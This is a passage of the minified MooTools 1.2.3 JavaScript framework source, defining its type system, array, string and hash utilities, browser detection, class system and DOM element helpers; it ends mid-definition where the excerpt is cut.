

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980aa0fb74d2f6eb80bcd9f5b8e1fd6fbb8f607"};var Native=function(k){k=k||{};var a=k.name;var i=k.legacy;var b=k.protect;
var c=k.implement;var h=k.generics;var f=k.initialize;var g=k.afterImplement||function(){};var d=f||i;h=h!==false;d.constructor=Native;d.$family={name:"native"};
if(i&&f){d.prototype=i.prototype;}d.prototype.constructor=d;if(a){var e=a.toLowerCase();d.prototype.$family={name:e};Native.typize(d,e);}var j=function(n,l,o,m){if(!b||m||!n.prototype[l]){n.prototype[l]=o;
}if(h){Native.genericize(n,l,b);}g.call(n,l,o);return n;};d.alias=function(n,l,p){if(typeof n=="string"){var o=this.prototype[n];if((n=o)){return j(this,l,n,p);
}}for(var m in n){this.alias(m,n[m],l);}return this;};d.implement=function(m,l,o){if(typeof m=="string"){return j(this,m,l,o);}for(var n in m){j(this,n,m[n],l);
}return this;};if(c){d.implement(c);}return d;};Native.genericize=function(b,c,a){if((!a||!b[c])&&typeof b.prototype[c]=="function"){b[c]=function(){var d=Array.prototype.slice.call(arguments);
return b.prototype[c].apply(d.shift(),d);};}};Native.implement=function(d,c){for(var b=0,a=d.length;b<a;b++){d[b].implement(c);}};Native.typize=function(a,b){if(!a.type){a.type=function(c){return($type(c)===b);
};}};(function(){var a={Array:Array,Date:Date,Function:Function,Number:Number,RegExp:RegExp,String:String};for(var h in a){new Native({name:h,initialize:a[h],protect:true});
}var d={"boolean":Boolean,"native":Native,object:Object};for(var c in d){Native.typize(d[c],c);}var f={Array:["concat","indexOf","join","lastIndexOf","pop","push","reverse","shift","slice","sort","splice","toString","unshift","valueOf"],String:["charAt","charCodeAt","concat","indexOf","lastIndexOf","match","replace","search","slice","split","substr","substring","toLowerCase","toUpperCase","valueOf"]};
for(var e in f){for(var b=f[e].length;b--;){Native.genericize(a[e],f[e][b],true);}}})();var Hash=new Native({name:"Hash",initialize:function(a){if($type(a)=="hash"){a=$unlink(a.getClean());
}for(var b in a){this[b]=a[b];}return this;}});Hash.implement({forEach:function(b,c){for(var a in this){if(this.hasOwnProperty(a)){b.call(c,this[a],a,this);
}}},getClean:function(){var b={};for(var a in this){if(this.hasOwnProperty(a)){b[a]=this[a];}}return b;},getLength:function(){var b=0;for(var a in this){if(this.hasOwnProperty(a)){b++;
}}return b;}});Hash.alias("forEach","each");Array.implement({forEach:function(c,d){for(var b=0,a=this.length;b<a;b++){c.call(d,this[b],b,this);}}});Array.alias("forEach","each");
function $A(b){if(b.item){var a=b.length,c=new Array(a);while(a--){c[a]=b[a];}return c;}return Array.prototype.slice.call(b);}function $arguments(a){return function(){return arguments[a];
};}function $chk(a){return !!(a||a===0);}function $clear(a){clearTimeout(a);clearInterval(a);return null;}function $defined(a){return(a!=undefined);}function $each(c,b,d){var a=$type(c);
((a=="arguments"||a=="collection"||a=="array")?Array:Hash).each(c,b,d);}function $empty(){}function $extend(c,a){for(var b in (a||{})){c[b]=a[b];}return c;
}function $H(a){return new Hash(a);}function $lambda(a){return($type(a)=="function")?a:function(){return a;};}function $merge(){var a=Array.slice(arguments);
a.unshift({});return $mixin.apply(null,a);}function $mixin(e){for(var d=1,a=arguments.length;d<a;d++){var b=arguments[d];if($type(b)!="object"){continue;
}for(var c in b){var g=b[c],f=e[c];e[c]=(f&&$type(g)=="object"&&$type(f)=="object")?$mixin(f,g):$unlink(g);}}return e;}function $pick(){for(var b=0,a=arguments.length;
b<a;b++){if(arguments[b]!=undefined){return arguments[b];}}return null;}function $random(b,a){return Math.floor(Math.random()*(a-b+1)+b);}function $splat(b){var a=$type(b);
return(a)?((a!="array"&&a!="arguments")?[b]:b):[];}var $time=Date.now||function(){return +new Date;};function $try(){for(var b=0,a=arguments.length;b<a;
b++){try{return arguments[b]();}catch(c){}}return null;}function $type(a){if(a==undefined){return false;}if(a.$family){return(a.$family.name=="number"&&!isFinite(a))?false:a.$family.name;
}if(a.nodeName){switch(a.nodeType){case 1:return"element";case 3:return(/\S/).test(a.nodeValue)?"textnode":"whitespace";}}else{if(typeof a.length=="number"){if(a.callee){return"arguments";
}else{if(a.item){return"collection";}}}}return typeof a;}function $unlink(c){var b;switch($type(c)){case"object":b={};for(var e in c){b[e]=$unlink(c[e]);
}break;case"hash":b=new Hash(c);break;case"array":b=[];for(var d=0,a=c.length;d<a;d++){b[d]=$unlink(c[d]);}break;default:return c;}return b;}var Browser=$merge({Engine:{name:"unknown",version:0},Platform:{name:(window.orientation!=undefined)?"ipod":(navigator.platform.match(/mac|win|linux/i)||["other"])[0].toLowerCase()},Features:{xpath:!!(document.evaluate),air:!!(window.runtime),query:!!(document.querySelector)},Plugins:{},Engines:{presto:function(){return(!window.opera)?false:((arguments.callee.caller)?960:((document.getElementsByClassName)?950:925));
},trident:function(){return(!window.ActiveXObject)?false:((window.XMLHttpRequest)?5:4);},webkit:function(){return(navigator.taintEnabled)?false:((Browser.Features.xpath)?((Browser.Features.query)?525:420):419);
},gecko:function(){return(document.getBoxObjectFor==undefined)?false:((document.getElementsByClassName)?19:18);}}},Browser||{});Browser.Platform[Browser.Platform.name]=true;
Browser.detect=function(){for(var b in this.Engines){var a=this.Engines[b]();if(a){this.Engine={name:b,version:a};this.Engine[b]=this.Engine[b+a]=true;
break;}}return{name:b,version:a};};Browser.detect();Browser.Request=function(){return $try(function(){return new XMLHttpRequest();},function(){return new ActiveXObject("MSXML2.XMLHTTP");
});};Browser.Features.xhr=!!(Browser.Request());Browser.Plugins.Flash=(function(){var a=($try(function(){return navigator.plugins["Shockwave Flash"].description;
},function(){return new ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version");})||"0 r0").match(/\d+/g);return{version:parseInt(a[0]||0+"."+a[1],10)||0,build:parseInt(a[2],10)||0};
})();function $exec(b){if(!b){return b;}if(window.execScript){window.execScript(b);}else{var a=document.createElement("script");a.setAttribute("type","text/javascript");
a[(Browser.Engine.webkit&&Browser.Engine.version<420)?"innerText":"text"]=b;document.head.appendChild(a);document.head.removeChild(a);}return b;}Native.UID=1;
var $uid=(Browser.Engine.trident)?function(a){return(a.uid||(a.uid=[Native.UID++]))[0];}:function(a){return a.uid||(a.uid=Native.UID++);};var Window=new Native({name:"Window",legacy:(Browser.Engine.trident)?null:window.Window,initialize:function(a){$uid(a);
if(!a.Element){a.Element=$empty;if(Browser.Engine.webkit){a.document.createElement("iframe");}a.Element.prototype=(Browser.Engine.webkit)?window["[[DOMElement.prototype]]"]:{};
}a.document.window=a;return $extend(a,Window.Prototype);},afterImplement:function(b,a){window[b]=Window.Prototype[b]=a;}});Window.Prototype={$family:{name:"window"}};
new Window(window);var Document=new Native({name:"Document",legacy:(Browser.Engine.trident)?null:window.Document,initialize:function(a){$uid(a);a.head=a.getElementsByTagName("head")[0];
a.html=a.getElementsByTagName("html")[0];if(Browser.Engine.trident&&Browser.Engine.version<=4){$try(function(){a.execCommand("BackgroundImageCache",false,true);
});}if(Browser.Engine.trident){a.window.attachEvent("onunload",function(){a.window.detachEvent("onunload",arguments.callee);a.head=a.html=a.window=null;
});}return $extend(a,Document.Prototype);},afterImplement:function(b,a){document[b]=Document.Prototype[b]=a;}});Document.Prototype={$family:{name:"document"}};
new Document(document);Array.implement({every:function(c,d){for(var b=0,a=this.length;b<a;b++){if(!c.call(d,this[b],b,this)){return false;}}return true;
},filter:function(d,e){var c=[];for(var b=0,a=this.length;b<a;b++){if(d.call(e,this[b],b,this)){c.push(this[b]);}}return c;},clean:function(){return this.filter($defined);
},indexOf:function(c,d){var a=this.length;for(var b=(d<0)?Math.max(0,a+d):d||0;b<a;b++){if(this[b]===c){return b;}}return -1;},map:function(d,e){var c=[];
for(var b=0,a=this.length;b<a;b++){c[b]=d.call(e,this[b],b,this);}return c;},some:function(c,d){for(var b=0,a=this.length;b<a;b++){if(c.call(d,this[b],b,this)){return true;
}}return false;},associate:function(c){var d={},b=Math.min(this.length,c.length);for(var a=0;a<b;a++){d[c[a]]=this[a];}return d;},link:function(c){var a={};
for(var e=0,b=this.length;e<b;e++){for(var d in c){if(c[d](this[e])){a[d]=this[e];delete c[d];break;}}}return a;},contains:function(a,b){return this.indexOf(a,b)!=-1;
},extend:function(c){for(var b=0,a=c.length;b<a;b++){this.push(c[b]);}return this;},getLast:function(){return(this.length)?this[this.length-1]:null;},getRandom:function(){return(this.length)?this[$random(0,this.length-1)]:null;
},include:function(a){if(!this.contains(a)){this.push(a);}return this;},combine:function(c){for(var b=0,a=c.length;b<a;b++){this.include(c[b]);}return this;
},erase:function(b){for(var a=this.length;a--;a){if(this[a]===b){this.splice(a,1);}}return this;},empty:function(){this.length=0;return this;},flatten:function(){var d=[];
for(var b=0,a=this.length;b<a;b++){var c=$type(this[b]);if(!c){continue;}d=d.concat((c=="array"||c=="collection"||c=="arguments")?Array.flatten(this[b]):this[b]);
}return d;},hexToRgb:function(b){if(this.length!=3){return null;}var a=this.map(function(c){if(c.length==1){c+=c;}return c.toInt(16);});return(b)?a:"rgb("+a+")";
},rgbToHex:function(d){if(this.length<3){return null;}if(this.length==4&&this[3]==0&&!d){return"transparent";}var b=[];for(var a=0;a<3;a++){var c=(this[a]-0).toString(16);
b.push((c.length==1)?"0"+c:c);}return(d)?b:"#"+b.join("");}});Function.implement({extend:function(a){for(var b in a){this[b]=a[b];}return this;},create:function(b){var a=this;
b=b||{};return function(d){var c=b.arguments;c=(c!=undefined)?$splat(c):Array.slice(arguments,(b.event)?1:0);if(b.event){c=[d||window.event].extend(c);
}var e=function(){return a.apply(b.bind||null,c);};if(b.delay){return setTimeout(e,b.delay);}if(b.periodical){return setInterval(e,b.periodical);}if(b.attempt){return $try(e);
}return e();};},run:function(a,b){return this.apply(b,$splat(a));},pass:function(a,b){return this.create({bind:b,arguments:a});},bind:function(b,a){return this.create({bind:b,arguments:a});
},bindWithEvent:function(b,a){return this.create({bind:b,arguments:a,event:true});},attempt:function(a,b){return this.create({bind:b,arguments:a,attempt:true})();
},delay:function(b,c,a){return this.create({bind:c,arguments:a,delay:b})();},periodical:function(c,b,a){return this.create({bind:b,arguments:a,periodical:c})();
}});Number.implement({limit:function(b,a){return Math.min(a,Math.max(b,this));},round:function(a){a=Math.pow(10,a||0);return Math.round(this*a)/a;},times:function(b,c){for(var a=0;
a<this;a++){b.call(c,a,this);}},toFloat:function(){return parseFloat(this);},toInt:function(a){return parseInt(this,a||10);}});Number.alias("times","each");
(function(b){var a={};b.each(function(c){if(!Number[c]){a[c]=function(){return Math[c].apply(null,[this].concat($A(arguments)));};}});Number.implement(a);
})(["abs","acos","asin","atan","atan2","ceil","cos","exp","floor","log","max","min","pow","sin","sqrt","tan"]);String.implement({test:function(a,b){return((typeof a=="string")?new RegExp(a,b):a).test(this);
},contains:function(a,b){return(b)?(b+this+b).indexOf(b+a+b)>-1:this.indexOf(a)>-1;},trim:function(){return this.replace(/^\s+|\s+$/g,"");},clean:function(){return this.replace(/\s+/g," ").trim();
},camelCase:function(){return this.replace(/-\D/g,function(a){return a.charAt(1).toUpperCase();});},hyphenate:function(){return this.replace(/[A-Z]/g,function(a){return("-"+a.charAt(0).toLowerCase());
});},capitalize:function(){return this.replace(/\b[a-z]/g,function(a){return a.toUpperCase();});},escapeRegExp:function(){return this.replace(/([-.*+?^${}()|[\]\/\\])/g,"\\$1");
},toInt:function(a){return parseInt(this,a||10);},toFloat:function(){return parseFloat(this);},hexToRgb:function(b){var a=this.match(/^#?(\w{1,2})(\w{1,2})(\w{1,2})$/);
return(a)?a.slice(1).hexToRgb(b):null;},rgbToHex:function(b){var a=this.match(/\d{1,3}/g);return(a)?a.rgbToHex(b):null;},stripScripts:function(b){var a="";
var c=this.replace(/<script[^>]*>([\s\S]*?)<\/script>/gi,function(){a+=arguments[1]+"\n";return"";});if(b===true){$exec(a);}else{if($type(b)=="function"){b(a,c);
}}return c;},substitute:function(a,b){return this.replace(b||(/\\?\{([^{}]+)\}/g),function(d,c){if(d.charAt(0)=="\\"){return d.slice(1);}return(a[c]!=undefined)?a[c]:"";
});}});Hash.implement({has:Object.prototype.hasOwnProperty,keyOf:function(b){for(var a in this){if(this.hasOwnProperty(a)&&this[a]===b){return a;}}return null;
},hasValue:function(a){return(Hash.keyOf(this,a)!==null);},extend:function(a){Hash.each(a||{},function(c,b){Hash.set(this,b,c);},this);return this;},combine:function(a){Hash.each(a||{},function(c,b){Hash.include(this,b,c);
},this);return this;},erase:function(a){if(this.hasOwnProperty(a)){delete this[a];}return this;},get:function(a){return(this.hasOwnProperty(a))?this[a]:null;
},set:function(a,b){if(!this[a]||this.hasOwnProperty(a)){this[a]=b;}return this;},empty:function(){Hash.each(this,function(b,a){delete this[a];},this);
return this;},include:function(a,b){if(this[a]==undefined){this[a]=b;}return this;},map:function(b,c){var a=new Hash;Hash.each(this,function(e,d){a.set(d,b.call(c,e,d,this));
},this);return a;},filter:function(b,c){var a=new Hash;Hash.each(this,function(e,d){if(b.call(c,e,d,this)){a.set(d,e);}},this);return a;},every:function(b,c){for(var a in this){if(this.hasOwnProperty(a)&&!b.call(c,this[a],a)){return false;
}}return true;},some:function(b,c){for(var a in this){if(this.hasOwnProperty(a)&&b.call(c,this[a],a)){return true;}}return false;},getKeys:function(){var a=[];
Hash.each(this,function(c,b){a.push(b);});return a;},getValues:function(){var a=[];Hash.each(this,function(b){a.push(b);});return a;},toQueryString:function(a){var b=[];
Hash.each(this,function(f,e){if(a){e=a+"["+e+"]";}var d;switch($type(f)){case"object":d=Hash.toQueryString(f,e);break;case"array":var c={};f.each(function(h,g){c[g]=h;
});d=Hash.toQueryString(c,e);break;default:d=e+"="+encodeURIComponent(f);}if(f!=undefined){b.push(d);}});return b.join("&");}});Hash.alias({keyOf:"indexOf",hasValue:"contains"});
var Event=new Native({name:"Event",initialize:function(a,f){f=f||window;var k=f.document;a=a||f.event;if(a.$extended){return a;}this.$extended=true;var j=a.type;
var g=a.target||a.srcElement;while(g&&g.nodeType==3){g=g.parentNode;}if(j.test(/key/)){var b=a.which||a.keyCode;var m=Event.Keys.keyOf(b);if(j=="keydown"){var d=b-111;
if(d>0&&d<13){m="f"+d;}}m=m||String.fromCharCode(b).toLowerCase();}else{if(j.match(/(click|mouse|menu)/i)){k=(!k.compatMode||k.compatMode=="CSS1Compat")?k.html:k.body;
var i={x:a.pageX||a.clientX+k.scrollLeft,y:a.pageY||a.clientY+k.scrollTop};var c={x:(a.pageX)?a.pageX-f.pageXOffset:a.clientX,y:(a.pageY)?a.pageY-f.pageYOffset:a.clientY};
if(j.match(/DOMMouseScroll|mousewheel/)){var h=(a.wheelDelta)?a.wheelDelta/120:-(a.detail||0)/3;}var e=(a.which==3)||(a.button==2);var l=null;if(j.match(/over|out/)){switch(j){case"mouseover":l=a.relatedTarget||a.fromElement;
break;case"mouseout":l=a.relatedTarget||a.toElement;}if(!(function(){while(l&&l.nodeType==3){l=l.parentNode;}return true;}).create({attempt:Browser.Engine.gecko})()){l=false;
}}}}return $extend(this,{event:a,type:j,page:i,client:c,rightClick:e,wheel:h,relatedTarget:l,target:g,code:b,key:m,shift:a.shiftKey,control:a.ctrlKey,alt:a.altKey,meta:a.metaKey});
}});Event.Keys=new Hash({enter:13,up:38,down:40,left:37,right:39,esc:27,space:32,backspace:8,tab:9,"delete":46});Event.implement({stop:function(){return this.stopPropagation().preventDefault();
},stopPropagation:function(){if(this.event.stopPropagation){this.event.stopPropagation();}else{this.event.cancelBubble=true;}return this;},preventDefault:function(){if(this.event.preventDefault){this.event.preventDefault();
}else{this.event.returnValue=false;}return this;}});function Class(b){if(b instanceof Function){b={initialize:b};}var a=function(){Object.reset(this);if(a._prototyping){return this;
}this._current=$empty;var c=(this.initialize)?this.initialize.apply(this,arguments):this;delete this._current;delete this.caller;return c;}.extend(this);
a.implement(b);a.constructor=Class;a.prototype.constructor=a;return a;}Function.prototype.protect=function(){this._protected=true;return this;};Object.reset=function(a,c){if(c==null){for(var e in a){Object.reset(a,e);
}return a;}delete a[c];switch($type(a[c])){case"object":var d=function(){};d.prototype=a[c];var b=new d;a[c]=Object.reset(b);break;case"array":a[c]=$unlink(a[c]);
break;}return a;};new Native({name:"Class",initialize:Class}).extend({instantiate:function(b){b._prototyping=true;var a=new b;delete b._prototyping;return a;
},wrap:function(a,b,c){if(c._origin){c=c._origin;}return function(){if(c._protected&&this._current==null){throw new Error('The method "'+b+'" cannot be called.');
}var e=this.caller,f=this._current;this.caller=f;this._current=arguments.callee;var d=c.apply(this,arguments);this._current=f;this.caller=e;return d;}.extend({_owner:a,_origin:c,_name:b});
}});Class.implement({implement:function(a,d){if($type(a)=="object"){for(var e in a){this.implement(e,a[e]);}return this;}var f=Class.Mutators[a];if(f){d=f.call(this,d);
if(d==null){return this;}}var c=this.prototype;switch($type(d)){case"function":if(d._hidden){return this;}c[a]=Class.wrap(this,a,d);break;case"object":var b=c[a];
if($type(b)=="object"){$mixin(b,d);}else{c[a]=$unlink(d);}break;case"array":c[a]=$unlink(d);break;default:c[a]=d;}return this;}});Class.Mutators={Extends:function(a){this.parent=a;
this.prototype=Class.instantiate(a);this.implement("parent",function(){var b=this.caller._name,c=this.caller._owner.parent.prototype[b];if(!c){throw new Error('The method "'+b+'" has no parent.');
}return c.apply(this,arguments);}.protect());},Implements:function(a){$splat(a).each(function(b){if(b instanceof Function){b=Class.instantiate(b);}this.implement(b);
},this);}};var Chain=new Class({$chain:[],chain:function(){this.$chain.extend(Array.flatten(arguments));return this;},callChain:function(){return(this.$chain.length)?this.$chain.shift().apply(this,arguments):false;
},clearChain:function(){this.$chain.empty();return this;}});var Events=new Class({$events:{},addEvent:function(c,b,a){c=Events.removeOn(c);if(b!=$empty){this.$events[c]=this.$events[c]||[];
this.$events[c].include(b);if(a){b.internal=true;}}return this;},addEvents:function(a){for(var b in a){this.addEvent(b,a[b]);}return this;},fireEvent:function(c,b,a){c=Events.removeOn(c);
if(!this.$events||!this.$events[c]){return this;}this.$events[c].each(function(d){d.create({bind:this,delay:a,"arguments":b})();},this);return this;},removeEvent:function(b,a){b=Events.removeOn(b);
if(!this.$events[b]){return this;}if(!a.internal){this.$events[b].erase(a);}return this;},removeEvents:function(c){var d;if($type(c)=="object"){for(d in c){this.removeEvent(d,c[d]);
}return this;}if(c){c=Events.removeOn(c);}for(d in this.$events){if(c&&c!=d){continue;}var b=this.$events[d];for(var a=b.length;a--;a){this.removeEvent(d,b[a]);
}}return this;}});Events.removeOn=function(a){return a.replace(/^on([A-Z])/,function(b,c){return c.toLowerCase();});};var Options=new Class({setOptions:function(){this.options=$merge.run([this.options].extend(arguments));
if(!this.addEvent){return this;}for(var a in this.options){if($type(this.options[a])!="function"||!(/^on[A-Z]/).test(a)){continue;}this.addEvent(a,this.options[a]);
delete this.options[a];}return this;}});var Element=new Native({name:"Element",legacy:window.Element,initialize:function(a,b){var c=Element.Constructors.get(a);
if(c){return c(b);}if(typeof a=="string"){return document.newElement(a,b);}return document.id(a).set(b);},afterImplement:function(a,b){Element.Prototype[a]=b;
if(Array[a]){return;}Elements.implement(a,function(){var c=[],g=true;for(var e=0,d=this.length;e<d;e++){var f=this[e][a].apply(this[e],arguments);c.push(f);
if(g){g=($type(f)=="element");}}return(g)?new Elements(c):c;});}});Element.Prototype={$family:{name:"element"}};Element.Constructors=new Hash;var IFrame=new Native({name:"IFrame",generics:false,initialize:function(){var f=Array.link(arguments,{properties:Object.type,iframe:$defined});
var d=f.properties||{};var c=document.id(f.iframe);var e=d.onload||$empty;delete d.onload;d.id=d.name=$pick(d.id,d.name,c?(c.id||c.name):"IFrame_"+$time());
c=new Element(c||"iframe",d);var b=function(){var g=$try(function(){return c.contentWindow.location.host;});if(!g||g==window.location.host){var h=new Window(c.contentWindow);
new Document(c.contentWindow.document);$extend(h.Element.prototype,Element.Prototype);}e.call(c.contentWindow,c.contentWindow.document);};var a=$try(function(){return c.contentWindow;
});((a&&a.document.body)||window.frames[d.id])?b():c.addListener("load",b);return c;}});var Elements=new Native({initialize:function(f,b){b=$extend({ddup:true,cash:true},b);
f=f||[];if(b.ddup||b.cash){var g={},e=[];for(var c=0,a=f.length;c<a;c++){var d=document.id(f[c],!b.cash);if(b.ddup){if(g[d.uid]){continue;}g[d.uid]=true;
}e.push(d);}f=e;}return(b.cash)?$extend(f,this):f;}});Elements.implement({filter:function(a,b){if(!a){return this;}return new Elements(Array.filter(this,(typeof a=="string")?function(c){return c.match(a);
}:a,b));}});Document.implement({newElement:function(a,b){if(Browser.Engine.trident&&b){["name","type","checked"].each(function(c){if(!b[c]){return;}a+=" "+c+'="'+b[c]+'"';
if(c!="checked"){delete b[c];}});a="<"+a+">";}return document.id(this.createElement(a)).set(b);},newTextNode:function(a){return this.createTextNode(a);
},getDocument:function(){return this;},getWindow:function(){return this.window;},id:(function(){var a={string:function(d,c,b){d=b.getElementById(d);return(d)?a.element(d,c):null;
},element:function(b,e){$uid(b);if(!e&&!b.$family&&!(/^object|embed$/i).test(b.tagName)){var c=Element.Prototype;for(var d in c){b[d]=c[d];}}return b;},object:function(c,d,b){if(c.toElement){return a.element(c.toElement(b),d);
}return null;}};a.textnode=a.whitespace=a.window=a.document=$arguments(0);return function(c,e,d){if(c&&c.$family&&c.uid){return c;}var b=$type(c);return(a[b])?a[b](c,e,d||document):null;
};})()});if(window.$==null){Window.implement({$:function(a,b){return document.id(a,b,this.document);}});}Window.implement({$$:function(a){if(arguments.length==1&&typeof a=="string"){return this.document.getElements(a);
}var f=[];var c=Array.flatten(arguments);for(var d=0,b=c.length;d<b;d++){var e=c[d];switch($type(e)){case"element":f.push(e);break;case"string":f.extend(this.document.getElements(e,true));
}}return new Elements(f);},getDocument:function(){return this.document;},getWindow:function(){return this;}});Native.implement([Element,Document],{getElement:function(a,b){return document.id(this.getElements(a,true)[0]||null,b);
},getElements:function(a,d){a=a.split(",");var c=[];var b=(a.length>1);a.each(function(e){var f=this.getElementsByTagName(e.trim());(b)?c.extend(f):c=f;
},this);return new Elements(c,{ddup:b,cash:!d});}});(function(){var h={},f={};var i={input:"checked",option:"selected",textarea:(Browser.Engine.webkit&&Browser.Engine.version<420)?"innerHTML":"value"};
var c=function(l){return(f[l]||(f[l]={}));};var g=function(n,l){if(!n){return;}var m=n.uid;if(Browser.Engine.trident){if(n.clearAttributes){var q=l&&n.cloneNode(false);
n.clearAttributes();if(q){n.mergeAttributes(q);}}else{if(n.removeEvents){n.removeEvents();}}if((/object/i).test(n.tagName)){for(var o in n){if(typeof n[o]=="function"){n[o]=$empty;
}}Element.dispose(n);}}if(!m){return;}h[m]=f[m]=null;};var d=function(){Hash.each(h,g);if(Browser.Engine.trident){$A(document.getElementsByTagName("object")).each(g);
}if(window.CollectGarbage){CollectGarbage();}h=f=null;};var j=function(n,l,s,m,p,r){var o=n[s||l];var q=[];while(o){if(o.nodeType==1&&(!m||Element.match(o,m))){if(!p){return document.id(o,r);
}q.push(o);}o=o[l];}return(p)?new Elements(q,{ddup:false,cash:!r}):null;};var e={html:"innerHTML","class":"className","for":"htmlFor",defaultValue:"defaultValue",text:(Browser.Engine.trident||(Browser.Engine.webkit&&Browser.Engine.version<420))?"innerText":"textContent"};
var b=["compact","nowrap","ismap","declare","noshade","checked","disabled","readonly","multiple","selected","noresize","defer"];var k=["value","type","defaultValue","accessKey","cellPadding","cellSpacing","colSpan","frameBorder","maxLength","readOnly","rowSpan","tabIndex","useMap"];
b=b.associate(b);Hash.extend(e,b);Hash.extend(e,k.associate(k.map(String.toLowerCase)));var a={before:function(m,l){if(l.parentNode){l.parentNode.insertBefore(m,l);
}},after:function(m,l){if(!l.parentNode){return;}var n=l.nextSibling;(n)?l.parentNode.insertBefore(m,n):l.parentNode.appendChild(m);},bottom:function(m,l){l.appendChild(m);
},top:function(m,l){var n=l.firstChild;(n)?l.insertBefore(m,n):l.appendChild(m);}};a.inside=a.bottom;Hash.each(a,function(l,m){m=m.capitalize();Element.implement("inject"+m,function(n){l(this,document.id(n,true));
return this;});Element.implement("grab"+m,function(n){l(document.id(n,true),this);return this;});});Element.implement({set:function(o,m){switch($type(o)){case"object":for(var n in o){this.set(n,o[n]);
}break;case"string":var l=Element.Properties.get(o);(l&&l.set)?l.set.apply(this,Array.slice(arguments,1)):this.setProperty(o,m);}return this;},get:function(m){var l=Element.Properties.get(m);
return(l&&l.get)?l.get.apply(this,Array.slice(arguments,1)):this.getProperty(m);},erase:function(m){var l=Element.Properties.get(m);(l&&l.erase)?l.erase.apply(this):this.removeProperty(m);
return this;},setProperty:function(m,n){var l=e[m];if(n==undefined){return this.removeProperty(m);}if(l&&b[m]){n=!!n;}(l)?this[l]=n:this.setAttribute(m,""+n);
return this;},setProperties:function(l){for(var m in l){this.setProperty(m,l[m]);}return this;},getProperty:function(m){var l=e[m];var n=(l)?this[l]:this.getAttribute(m,2);
return(b[m])?!!n:(l)?n:n||null;},getProperties:function(){var l=$A(arguments);return l.map(this.getProperty,this).associate(l);},removeProperty:function(m){var l=e[m];
(l)?this[l]=(l&&b[m])?false:"":this.removeAttribute(m);return this;},removeProperties:function(){Array.each(arguments,this.removeProperty,this);return this;
},hasClass:function(l){return this.className.contains(l," ");},addClass:function(l){if(!this.hasClass(l)){this.className=(this.className+" "+l).clean();
}return this;},removeClass:function(l){this.className=this.className.replace(new RegExp("(^|\\s)"+l+"(?:\\s|$)"),"$1");return this;},toggleClass:function(l){return this.hasClass(l)?this.removeClass(l):this.addClass(l);
},adopt:function(){Array.flatten(arguments).each(function(l){l=document.id(l,true);if(l){this.appendChild(l);}},this);return this;},appendText:function(m,l){return this.grab(this.getDocument().newTextNode(m),l);
},grab:function(m,l){a[l||"bottom"](document.id(m,true),this);return this;},inject:function(m,l){a[l||"bottom"](this,document.id(m,true));return this;},replaces:function(l){l=document.id(l,true);
l.parentNode.replaceChild(this,l);return this;},wraps:function(m,l){m=document.id(m,true);return this.replaces(m).grab(m,l);},getPrevious:function(l,m){return j(this,"previousSibling",null,l,false,m);
},getAllPrevious:function(l,m){return j(this,"previousSibling",null,l,true,m);},getNext:function(l,m){return j(this,"nextSibling",null,l,false,m);},getAllNext:function(l,m){return j(this,"nextSibling",null,l,true,m);
},getFirst:function(l,m){return j(this,"nextSibling","firstChild",l,false,m);},getLast:function(l,m){return j(this,"previousSibling","lastChild",l,false,m);
},getParent:function(l,m){return j(this,"parentNode",null,l,false,m);},getParents:function(l,m){return j(this,"parentNode",null,l,true,m);},getSiblings:function(l,m){return this.getParent().getChildren(l,m).erase(this);
},getChildren:function(l,m){return j(this,"nextSibling","firstChild",l,true,m);},getWindow:function(){return this.ownerDocument.window;},getDocument:function(){return this.ownerDocument;
},getElementById:function(o,n){var m=this.ownerDocument.getElementById(o);if(!m){return null;}for(var l=m.parentNode;l!=this;l=l.parentNode){if(!l){return null;
}}return document.id(m,n);},getSelected:function(){return new Elements($A(this.options).filter(function(l){return l.selected;}));},getComputedStyle:function(m){if(this.currentStyle){return this.currentStyle[m.camelCase()];
}var l=this.getDocument().defaultView.getComputedStyle(this,null);return(l)?l.getPropertyValue([m.hyphenate()]):null;},toQueryString:function(){var l=[];
this.getElements("input, select, textarea",true).each(function(m){if(!m.name||m.disabled||m.type=="submit"||m.type=="reset"||m.type=="file"){return;}var n=(m.tagName.toLowerCase()=="select")?Element.getSelected(m).map(function(o){return o.value;
}):((m.type=="radio"||m.type=="checkbox")&&!m.checked)?null:m.value;$splat(n).each(function(o){if(typeof o!="undefined"){l.push(m.name+"="+encodeURIComponent(o));
}});});return l.join("&");},clone:function(o,l){o=o!==false;var r=this.cloneNode(o);var n=function(v,u){if(!l){v.removeAttribute("id");}if(Browser.Engine.trident){v.clearAttributes();
v.mergeAttributes(u);v.removeAttribute("uid");if(v.options){var w=v.options,s=u.options;for(var t=w.length;t--;){w[t].selected=s[t].selected;}}}var x=i[u.tagName.toLowerCase()];
if(x&&u[x]){v[x]=u[x];}};if(o){var p=r.getElementsByTagName("*"),q=this.getElementsByTagName("*");for(var m=p.length;m--;){n(p[m],q[m]);}}n(r,this);return document.id(r);
},destroy:function(){Element.empty(this);Element.dispose(this);g(this,true);return null;},empty:function(){$A(this.childNodes).each(function(l){Element.destroy(l);
});return this;},dispose:function(){return(this.parentNode)?this.parentNode.removeChild(this):this;},hasChild:function(l){l=document.id(l,true);if(!l){return false;
}if(Browser.Engine.webkit&&Browser.Engine.version<420){return $A(this.getElementsByTagName(l.tagName)).contains(l);}return(this.contains)?(this!=l&&this.contains(l)):!!(this.compareDocumentPosition(l)&16);
},match:function(l){return(!l||(l==this)||(Element.get(this,"tag")==l));}});Native.implement([Element,Window,Document],{addListener:function(o,n){if(o=="unload"){var l=n,m=this;
n=function(){m.removeListener("unload",n);l();};}else{h[this.uid]=this;}if(this.addEventListener){this.addEventListener(o,n,false);}else{this.attachEvent("on"+o,n);
}return this;},removeListener:function(m,l){if(this.removeEventListener){this.removeEventListener(m,l,false);}else{this.detachEvent("on"+m,l);}return this;
},retrieve:function(m,l){var o=c(this.uid),n=o[m];if(l!=undefined&&n==undefined){n=o[m]=l;}return $pick(n);},store:function(m,l){var n=c(this.uid);n[m]=l;
return this;},eliminate:function(l){var m=c(this.uid);delete m[l];return this;}});window.addListener("unload",d);})();Element.Properties=new Hash;Element.Properties.style={set:function(a){this.style.cssText=a;
},get:function(){return this.style.cssText;},erase:function(){this.style.cssText="";}};Element.Properties.tag={get:function(){return this.tagName.toLowerCase();
